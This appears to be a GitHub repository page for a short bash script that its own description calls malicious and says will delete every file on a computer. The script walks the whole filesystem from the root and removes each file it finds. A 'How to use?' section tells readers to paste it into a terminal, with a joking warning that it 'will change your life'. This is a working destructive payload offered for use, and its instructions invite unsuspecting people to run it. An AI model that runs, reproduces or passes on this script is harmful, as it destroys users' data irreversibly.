aldrin112602 / dangerous-script

Malicious script that will delete all files in your computer

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

dangerous-script

#!/bin/bash

while read -r line; do
    rm $line
done < <(find / -xdev -type f)

How to use?

  • Open integrated terminal or CMD
  • run: copy this script and paste it into CMD terminal
  • Note: this script will change your life, your goal, and your system

About

Malicious script that will delete all files in your computer


Languages

Language:Shell 100.0%